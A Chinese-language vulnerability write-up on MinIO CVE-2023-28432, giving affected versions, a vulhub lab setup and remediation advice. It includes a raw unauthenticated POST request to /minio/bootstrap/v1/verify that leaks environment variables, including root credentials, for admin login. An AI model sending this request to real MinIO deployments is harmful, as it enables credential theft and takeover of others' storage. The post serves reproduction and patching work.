漏洞说明

MinIO verify接口(未授权问题）存在敏感信息泄漏漏洞，攻击者通过构造特殊URL地址，读取系统敏感信息，其中包括环境变量，有的服务器还会获取到AK/SK，获取后可直接登录后台。此漏洞影响集群节点，单节点不受影响 。

MinIo

MinIO 是一种开源的对象存储服务，它兼容 Amazon S3 API，可以在私有云或公有云中使用。MinIO 是一种高性能、高可用性的分布式存储系统，它可以存储大量数据，并提供对数据的高速读写能力。MinIO 采用分布式架构，可以在多个节点上运行，从而实现数据的分布式存储和处理。

影响版本

RELEASE.2019-12-17T23-16-33Z <= MinIo < RELEASE.2023-03-20T20-16-18Z

漏洞复现

环境搭建使用P🐮的vulhub进行启动：

https://github.com/vulhub/vulhub/tree/master/minio/CVE-2023-28432

docker-compose up -d

启动后访问 http://ip:9001，可以查看Web管理页面， http://ip:9000是API服务。

POC:

https://github.com/Henry4E36/POCS/tree/main/Minio

POST /minio/bootstrap/v1/verify HTTP/1.1Host: ip:9000User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 0

其中包含 MINIO_ROOT_USER 和 MINIO_ROOT_PASSWORD 。使用这个账号密码，即可成功登录管理后台

修复建议

1、升级到安全版本RELEASE.2023-03-20T20-16-18Z，下载链接：

https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z

2、临时修复方案，在waf上配置策略，拒绝所有post到/minio/bootstrap/v1/verify的请求。

本文章仅用于学习交流，不得用于非法用途